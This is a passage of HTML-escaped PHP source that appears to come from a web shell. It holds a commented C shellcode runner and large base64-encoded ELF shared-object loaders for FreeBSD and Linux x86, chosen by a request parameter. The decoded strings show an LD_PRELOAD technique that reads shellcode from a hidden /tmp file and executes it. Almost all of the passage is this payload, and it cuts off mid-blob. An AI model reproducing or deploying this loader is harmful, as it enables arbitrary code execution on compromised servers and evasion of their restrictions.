{\r\n exit(1);\r\n }\r\n if (read(fd,shellcode,SHELLCODE_MAX_SIZE) &lt; 0){\r\n exit(1);\r\n }\r\n (*(void(*)()) shellcode)();\r\n}\r\n \r\n*/\r\n \r\nif ($_REQUEST['os']=='freebsd'){\r\n// freebsd shellcode loader (x86)\r\n$shellcode_loader=\r\n&quot;f0VMRgEBAQkAAAAAAAAAAAMAAwABAAAAeAUAADQAAADsCQAAAAAAADQAIAADACgAFwAUAAEAAAAA\r\nAAAAAAAAAAAAAADhBwAA4QcAAAUAAAAAEAAAAQAAAOQHAADkFwAA5BcAAPwAAAAYAQAABgAAAAAQ\r\nAAACAAAA8AcAAPAXAADwFwAAoAAAAKAAAAAGAAAABAAAABEAAAAkAAAAAAAAAB0AAAAeAAAAIgAA\r\nABUAAAAAAAAAAAAAABoAAAAcAAAAIwAAACEAAAAbAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXAAAAFAAAABYA\r\nAAAZAAAAAAAAAB8AAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAwAB\r\nAAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAGQEAAAAAAAAAwAEAAAAAACUBAAA\r\nAAAAAAMABQAAAAAA1AQAAAAAAAADAAYAAAAAAOgEAAAAAAAAAwAHAAAAAAB4BQAAAAAAAAMACAAA\r\nAAAAJAcAAAAAAAADAAkAAAAAADAHAAAAAAAAAwAKAAAAAADkFwAAAAAAAAMACwAAAAAA7BcAAAAA\r\nAAADAAwAAAAAAPAXAAAAAAAAAwANAAAAAACQGAAAAAAAAAMADgAAAAAAmBgAAAAAAAADAA8AAAAA\r\nAKAYAAAAAAAAAwAQAAAAAACkGAAAAAAAAAMAEQAAAAAA4BgAAAAAAAADABIAAAAAAAAAAAAAAAAA\r\nAwATAIQAAAAAAAAAAAAAABAAAAABAAAA8BcAAAAAAAARAPH/LAAAAAAAAAAAAAAAIAAAAH0AAABU\r\nBgAAnQAAABIACAAgAAAA1AQAAAAAAAASAAYAOwAAAAAAAAAAAAAAIAAAAJcAAAAAAAAAAAAAABAA\r\nAACjAAAA4BgAAAAAAAAQAPH/JgAAACQHAAAAAAAAEgAJAJwAAADgGAAAAAAAABAA8f8KAAAApBgA\r\nAAAAAAARAPH/rwAAAPwYAAAAAAAAEADx/5IAAAAAAAAAAAAAABAAAACNAAAAAAAAAAAAAAAQAAAA\r\naQAAAAAAAAAAAAAAIAAAAFMAAAAAAAAAAAAAACAAAAAAX0RZTkFNSUMAX0dMT0JBTF9PRkZTRVRf\r\nVEFCTEVfAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZGVyZWdpc3Rlcl9mcmFtZV9pbmZv\r\nAF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBfSnZfUmVnaXN0ZXJDbGFzc2VzAGdldHVpZAB1bnNldGVu\r\ndgBvcGVuAGV4aXQAcmVhZABfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZADkFwAACAAAAOgXAAAIAAAA\r\n0BgAAAYWAADUGAAABhkAANgYAAAGIgAA3BgAAAYjAACwGAAABxQAALQYAAAHFgAAuBgAAAcZAAC8\r\nGAAABxoAAMAYAAAHIAAAxBgAAAchAADIGAAAByIAAMwYAAAHIwAAg+wM6BQBAADoEwIAAIPEDMMA\r\nAAD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD/////oxQAAABo\r\nEAAAAOnA/////6MYAAAAaBgAAADpsP////+jHAAAAGggAAAA6aD/////oyAAAABoKAAAAOmQ////\r\n/6MkAAAAaDAAAADpgP////+jKAAAAGg4AAAA6XD///9VieVT6AAAAABbgcMjEwAAUYC7PAAAAAB1\r\nWIuTLAAAAIXSdB+D7Az/s0D////oXv///4PEEOsMkIPABImDRP/////Si4NE////ixCF0nXpi4Mw\r\nAAAAhcB0EoPsDI2DSP///1DoOP///4PEEMaDPAAAAAGLXfzJw5BVieVT6AAAAABbgcOrEgAAUIuD\r\nOAAAAIXAdBmD7AiNg0AAAABQjYNI////UOhH////g8QQi4P8////hcB0HouDNAAAAIXAdBSD7AyN\r\ng/z///9Q6BH///+DxBCJ9otd/MnDkJCQVYnlV1ZTgew8BAAA6AAAAABbgcM/EgAAg+wMjYPW7v//\r\nUOh9/v//g8QQjb24+///jbPh7v///LkSAAAA86SD7AhqAI2D4e7//1Dopf7//4PEEIlF5IN95AB5\r\nCoPsDGoB6H/+//+D7ARoAAQAAI2F2Pv//1D/deToWP7//4PEEIXAeQqD7AxqAehX/v//jYXY+///\r\n/9CNZfRbXl/Jw5CQkFWJ5VZT6AAAAABbgcOmEQAAjYPw////jXD8i0D86wiQg+4E/9CLBoP4/3X0\r\nW17Jw4PsDOhM/v//g8QMwyRGcmVlQlNEOiBzcmMvbGliL2NzdS9pMzg2LWVsZi9jcnRpLlMsdiAx\r\nLjcgMjAwNS8wNS8xOSAwNzozMTowNiBkZnIgRXhwICQATERfUFJFTE9BRAAvdG1wLy5YMTEtSUhT\r\nVEVBTQAkRnJlZUJTRDogc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0bi5TLHYgMS42IDIwMDUvMDUv\r\nMTkgMDc6MzE6MDYgZGZyIEV4cCAkAAAAAOQXAACcGAAAAAAAAAwAAADUBAAADQAAACQHAAAEAAAA\r\nlAAAAAUAAACwAwAABgAAAHABAAAKAAAAtAAAAAsAAAAQAAAAAwAAAKQYAAACAAAAQAAAABQAAAAR\r\nAAAAFwAAAJQEAAARAAAAZAQAABIAAAAwAAAAEwAAAAgAAAD6//9vAgAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAPAXAAAAAAAAAAAA\r\nAP4EAAAOBQAAHgUAAC4FAAA+BQAATgUAAF4FAABuBQAAAAAAAAAAAAAAAAAAAAAAAABHQ0M6IChH\r\nTlUpIDMuNC42IFtGcmVlQlNEXSAyMDA2MDMwNQAAR0NDOiAoR05VKSAzLjQuNiBbRnJlZUJTRF0g\r\nMjAwNjAzMDUAAEdDQzogKEdOVSkgMy40LjYgW0ZyZWVCU0RdIDIwMDYwMzA1AAAuc3ltdGFiAC5z\r\ndHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAucmVsLmR5bgAucmVsLnBsdAAu\r\naW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA\r\nLmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAGwAAAAUAAAACAAAAlAAAAJQAAADcAAAAAgAAAAAAAAAEAAAABAAAACEA\r\nAAALAAAAAgAAAHABAABwAQAAQAIAAAMAAAAUAAAABAAAABAAAAApAAAAAwAAAAIAAACwAwAAsAMA\r\nALQAAAAAAAAAAAAAAAEAAAAAAAAAMQAAAAkAAAACAAAAZAQAAGQEAAAwAAAAAgAAAAAAAAAEAAAA\r\nCAAAADoAAAAJAAAAAgAAAJQEAACUBAAAQAAAAAIAAAAHAAAABAAAAAgAAABDAAAAAQAAAAYAAADU\r\nBAAA1AQAABEAAAAAAAAAAAAAAAQAAAAAAAAAPgAAAAEAAAAGAAAA6AQAAOgEAACQAAAAAAAAAAAA\r\nAAAEAAAABAAAAEkAAAABAAAABgAAAHgFAAB4BQAArAEAAAAAAAAAAAAABAAAAAAAAABPAAAAAQAA\r\nAAYAAAAkBwAAJAcAAAwAAAAAAAAAAAAAAAQAAAAAAAAAVQAAAAEAAAACAAAAMAcAADAHAACxAAAA\r\nAAAAAAAAAAABAAAAAAAAAF0AAAABAAAAAwAAAOQXAADkBwAACAAAAAAAAAAAAAAABAAAAAAAAABj\r\nAAAAAQAAAAIAAADsFwAA7AcAAAQAAAAAAAAAAAAAAAQAAAAAAAAAbQAAAAYAAAADAAAA8BcAAPAH\r\nAACgAAAAAwAAAAAAAAAEAAAACAAAAHYAAAABAAAAAwAAAJAYAACQCAAACAAAAAAAAAAAAAAABAAA\r\nAAAAAAB9AAAAAQAAAAMAAACYGAAAmAgAAAgAAAAAAAAAAAAAAAQAAAAAAAAAhAAAAAEAAAADAAAA\r\noBgAAKAIAAAEAAAAAAAAAAAAAAAEAAAAAAAAAIkAAAABAAAAAwAAAKQYAACkCAAAPAAAAAAAAAAA\r\nAAAABAAAAAQAAACOAAAACAAAAAMAAADgGAAA4AgAABwAAAAAAAAAAAAAAAQAAAAAAAAAkwAAAAEA\r\nAAAAAAAAAAAAAOAIAABvAAAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAABPCQAAnAAA\r\nAAAAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAhA0AABAEAAAWAAAAMQAAAAQAAAAQAAAA\r\nCQAAAAMAAAAAAAAAAAAAAJQRAAD1AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAlAAAAAAAAAADAAEAAAAAAHABAAAAAAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAZAQAAAAA\r\nAAADAAQAAAAAAJQEAAAAAAAAAwAFAAAAAADUBAAAAAAAAAMABgAAAAAA6AQAAAAAAAADAAcAAAAA\r\nAHgFAAAAAAAAAwAIAAAAAAAkBwAAAAAAAAMACQAAAAAAMAcAAAAAAAADAAoAAAAAAOQXAAAAAAAA\r\nAwALAAAAAADsFwAAAAAAAAMADAAAAAAA8BcAAAAAAAADAA0AAAAAAJAYAAAAAAAAAwAOAAAAAACY\r\nGAAAAAAAAAMADwAAAAAAoBgAAAAAAAADABAAAAAAAKQYAAAAAAAAAwARAAAAAADgGAAAAAAAAAMA\r\nEgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAA\r\nAAAAAAADABYAAQAAAAAAAAAAAAAABADx/yIAAAAAAAAAAAAAAAQA8f8xAAAAAAAAAAAAAAAEAPH/\r\nAQAAAAAAAAAAAAAABADx/zwAAAAAAAAAAAAAAAQA8f9HAAAAkBgAAAAAAAABAA4AVQAAAJgYAAAA\r\nAAAAAQAPAGMAAADsFwAAAAAAAAEADAB2AAAAoBgAAAAAAAABABAAgwAAAOgXAAAAAAAAAQALAIcA\r\nAADgGAAAAQAAAAEAEgCTAAAAeAUAAAAAAAACAAgAqQAAAOQYAAAYAAAAAQASALIAAADwBQAAAAAA\r\nAAIACAA8AAAAAAAAAAAAAAAEAPH/vgAAAJQYAAAAAAAAAQAOAMsAAACcGAAAAAAAAAEADwDYAAAA\r\n7BcAAAAAAAABAAwA5gAAAKAYAAAAAAAAAQAQAPIAAAD0BgAAAAAAAAIACAAIAQAAAAAAAAAAAAAE\r\nAPH/IgAAAAAAAAAAAAAABADx/zEAAAAAAAAAAAAAAAQA8f8IAQAAAAAAAAAAAAAEAPH/KQEAAAAA\r\nAAAAAAAABADx/zUBAADkFwAAAAAAAAECCwBCAQAAAAAAAAAAAAAQAAAASwEAAPAXAAAAAAAAEQDx\r\n/1QBAAAAAAAAAAAAACAAAABjAQAAVAYAAJ0AAAASAAgAagEAANQEAAAAAAAAEgAGAHABAAAAAAAA\r\nAAAAACAAAACIAQAAAAAAAAAAAAAQAAAAjQEAAOAYAAAAAAAAEADx/5kBAAAkBwAAAAAAABIACQCf\r\nAQAA4BgAAAAAAAAQAPH/pgEAAKQYAAAAAAAAEQDx/7wBAAD8GAAAAAAAABAA8f/BAQAAAAAAAAAA\r\nAAAQAAAAxgEAAAAAAAAAAAAAEAAAAMsBAAAAAAAAAAAAACAAAADfAQAAAAAAAAAAAAAgAAAAAC91\r\nc3Ivc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0aS5TADxjb21tYW5kIGxpbmU+ADxidWlsdC1pbj4A\r\nY3J0c3R1ZmYuYwBfX0NUT1JfTElTVF9fAF9fRFRPUl9MSVNUX18AX19FSF9GUkFNRV9CRUdJTl9f\r\nAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AG9iamVj\r\ndC4yAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBf\r\nX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAL3Vzci9zcmMvbGliL2NzdS9pMzg2LWVs\r\nZi9jcnRuLlMAc2hlbGxjb2RlLmMAX19kc29faGFuZGxlAHVuc2V0ZW52AF9EWU5BTUlDAF9fY3hh\r\nX2ZpbmFsaXplAGdldHVpZABfaW5pdABfX2RlcmVnaXN0ZXJfZnJhbWVfaW5mbwByZWFkAF9fYnNz\r\nX3N0YXJ0AF9maW5pAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABleGl0AG9wZW4A\r\nX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm8A&quot;;\r\n}else{\r\n// default: linux\r\n// linux shellcode loader (x86)\r\n$shellcode_loader=\r\n&quot;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\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAAAAAAABAAAA\r\nXgAAAAwAAACQAwAADQAAAAgGAAAEAAAA9AAAAPX+/29AAQAABQAAAFwCAAAGAAAAfAEAAAoAAACW\r\nAAAACwAAABAAAAADAAAA9B8AAAIAAAAwAAAAFAAAABEAAAAXAAAAYAMAABEAAABAAwAAEgAAACAA\r\nAAATAAAACAAAAP7//28QAwAA////bwEAAADw//9v8gIAAPr//28BAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAfAAAAAAAAAAAAAL4DAADOAwAA\r\n3gMAAO4DAAD+AwAADgQAABggAAAAR0NDOiAoR2VudG9vIDQuMy4xLXIxIHAxLjEpIDQuMy4xAABH\r\nQ0M6IChHZW50b28gNC4zLjIgcDEuMSkgNC4zLjIAAEdDQzogKEdlbnRvbyA0LjMuMiBwMS4xKSA0\r\nLjMuMgAAR0NDOiAoR2VudG9vIDQuMy4yIHAxLjEpIDQuMy4yAABHQ0M6IChHZW50b28gNC4zLjEt\r\ncjEgcDEuMSkgNC4zLjEAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmdudS5oYXNoAC5keW5z\r\neW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQA\r\nLmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5k\r\neW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAFAAAAAgAAAPQAAAD0AAAATAAAAAMAAAAAAAAA\r\nBAAAAAQAAAAbAAAA9v//bwIAAABAAQAAQAEAADwAAAADAAAAAAAAAAQAAAAEAAAAJQAAAAsAAAAC\r\nAAAAfAEAAHwBAADgAAAABAAAAAEAAAAEAAAAEAAAAC0AAAADAAAAAgAAAFwCAABcAgAAlgAAAAAA\r\nAAAAAAAAAQAAAAAAAAA1AAAA////bwIAAADyAgAA8gIAABwAAAADAAAAAAAAAAIAAAACAAAAQgAA\r\nAP7//28CAAAAEAMAABADAAAwAAAABAAAAAEAAAAEAAAAAAAAAFEAAAAJAAAAAgAAAEADAABAAwAA\r\nIAAAAAMAAAAAAAAABAAAAAgAAABaAAAACQAAAAIAAABgAwAAYAMAADAAAAADAAAACgAAAAQAAAAI\r\nAAAAYwAAAAEAAAAGAAAAkAMAAJADAAAXAAAAAAAAAAAAAAAEAAAAAAAAAF4AAAABAAAABgAAAKgD\r\nAACoAwAAcAAAAAAAAAAAAAAABAAAAAQAAABpAAAAAQAAAAYAAAAgBAAAIAQAAOgBAAAAAAAAAAAA\r\nABAAAAAAAAAAbwAAAAEAAAAGAAAACAYAAAgGAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHUAAAABAAAA\r\nAgAAACQGAAAkBgAAHQAAAAAAAAAAAAAAAQAAAAAAAAB9AAAAAQAAAAIAAABEBgAARAYAAAQAAAAA\r\nAAAAAAAAAAQAAAAAAAAAhwAAAAEAAAADAAAADB8AAAwPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAI4A\r\nAAABAAAAAwAAABQfAAAUDwAACAAAAAAAAAAAAAAABAAAAAAAAACVAAAAAQAAAAMAAAAcHwAAHA8A\r\nAAQAAAAAAAAAAAAAAAQAAAAAAAAAmgAAAAYAAAADAAAAIB8AACAPAADIAAAABAAAAAAAAAAEAAAA\r\nCAAAAKMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACoAAAAAQAAAAMAAAD0\r\nHwAA9A8AACQAAAAAAAAAAAAAAAQAAAAEAAAAsQAAAAEAAAADAAAAGCAAABgQAAAEAAAAAAAAAAAA\r\nAAAEAAAAAAAAALcAAAAIAAAAAwAAABwgAAAcEAAACAAAAAAAAAAAAAAABAAAAAAAAAC8AAAAAQAA\r\nAAAAAAAAAAAAHBAAAKYAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMIQAADFAAAA\r\nAAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAADAFQAAsAIAABoAAAAeAAAABAAAABAAAAAJ\r\nAAAAAwAAAAAAAAAAAAAAcBgAAAsBAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAD0AAAAAAAAAAMAAQAAAAAAQAEAAAAAAAADAAIAAAAAAHwBAAAAAAAAAwADAAAAAABcAgAAAAAA\r\nAAMABAAAAAAA8gIAAAAAAAADAAUAAAAAABADAAAAAAAAAwAGAAAAAABAAwAAAAAAAAMABwAAAAAA\r\nYAMAAAAAAAADAAgAAAAAAJADAAAAAAAAAwAJAAAAAACoAwAAAAAAAAMACgAAAAAAIAQAAAAAAAAD\r\nAAsAAAAAAAgGAAAAAAAAAwAMAAAAAAAkBgAAAAAAAAMADQAAAAAARAYAAAAAAAADAA4AAAAAAAwf\r\nAAAAAAAAAwAPAAAAAAAUHwAAAAAAAAMAEAAAAAAAHB8AAAAAAAADABEAAAAAACAfAAAAAAAAAwAS\r\nAAAAAADoHwAAAAAAAAMAEwAAAAAA9B8AAAAAAAADABQAAAAAABggAAAAAAAAAwAVAAAAAAAcIAAA\r\nAAAAAAMAFgAAAAAAAAAAAAAAAAADABcAAQAAAAAAAAAAAAAABADx/w0AAAD0HwAAAAAAAAEC8f8j\r\nAAAAGCAAAAAAAAABAhUAMAAAAB